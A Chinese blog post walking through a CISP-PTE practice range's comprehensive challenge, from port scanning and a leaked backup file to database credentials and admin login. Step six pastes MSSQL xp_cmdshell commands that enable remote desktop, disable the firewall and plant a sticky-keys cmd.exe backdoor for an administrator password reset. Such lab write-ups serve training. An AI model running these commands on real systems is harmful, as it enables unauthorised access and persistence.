cisp-pte靶场通关思路分享----综合题篇

综合题目前只搞到一个靶场,一起来看看吧。。。

打开页面是这个样子的,

第一步:先来扫一下端口,爆破一下目录。

cisp-pte靶场通关思路分享----综合题篇

 

cisp-pte靶场通关思路分享----综合题篇

cisp-pte靶场通关思路分享----综合题篇

 

cisp-pte靶场通关思路分享----综合题篇

 

 

 看来80端口是没有什么可搞得,再来看看8080端口。

 cisp-pte靶场通关思路分享----综合题篇

 

 

 cisp-pte靶场通关思路分享----综合题篇

 

 8080端口是一个后台,还扫出了备份文件。

第二步:有了这个网站备份文件,当然要翻翻看,有没有什么账号密码什么的。

cisp-pte靶场通关思路分享----综合题篇

cisp-pte靶场通关思路分享----综合题篇

 

 

 第三步:打开navicat连接,得来全不费工夫。

cisp-pte靶场通关思路分享----综合题篇

 

 cisp-pte靶场通关思路分享----综合题篇

 

 cisp-pte靶场通关思路分享----综合题篇

第四步:得到第一个key,接着再翻翻其他库,找找后台账号密码。

cisp-pte靶场通关思路分享----综合题篇

 

 很顺利就找到了,不过需要解密

cisp-pte靶场通关思路分享----综合题篇

 第五步,有了后台账号密码,登陆看看,没想到,这个key就在页面里。

cisp-pte靶场通关思路分享----综合题篇

 第六步:登录进来以后,找找有没有上传点什么的。折腾了半天找了一堆无用的漏洞,上传点也上传不上去。这才想起来因为目标服务器系统是Windows 2003,所以可以利用数据库操作命令关闭系统防火墙,写入cmd弹窗木马。

cisp-pte靶场通关思路分享----综合题篇

 

 

 

这里把代码贴给大家:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'

EXEC master.dbo.xp_cmdshell 'cd C:\WINDOWS\system'

EXEC master.dbo.xp_cmdshell 'copy cmd.exe c:\WINDOWS\system\sethc.exe'     (这一操作不明白的建议看下结尾推荐的博文)

EXEC master.dbo.xp_cmdshell 'netstat -an'

想着建个用户就可以登录3389远程桌面了,但是谁想拒绝访问。

cisp-pte靶场通关思路分享----综合题篇

 

参考网上的解决办法 :

按5下shift 激活粘滞键,然后输入explorer.exe 刷新桌面,免密码选择计算机管理,修改administrator 密码
或者按5下后,输入计算机管理的单词:compmgmt.msc 调出计算机管理,改密码

进入桌面拿到key3

cisp-pte靶场通关思路分享----综合题篇

 

 

 

cisp-pte靶场通关思路分享----综合题篇

 

就这样修改密码,远程连接,就拿下最后一个key了。 

cisp-pte靶场通关思路分享----综合题篇

后来查了下这个功能,才大致了解了。详细的参考下面这个博客。

https://www.cnblogs.com/hai-long/p/12038251.html

 

上一篇:Linux 系统调用 fork wait exec


下一篇:eval函数 exec函数 compile函数之间的应用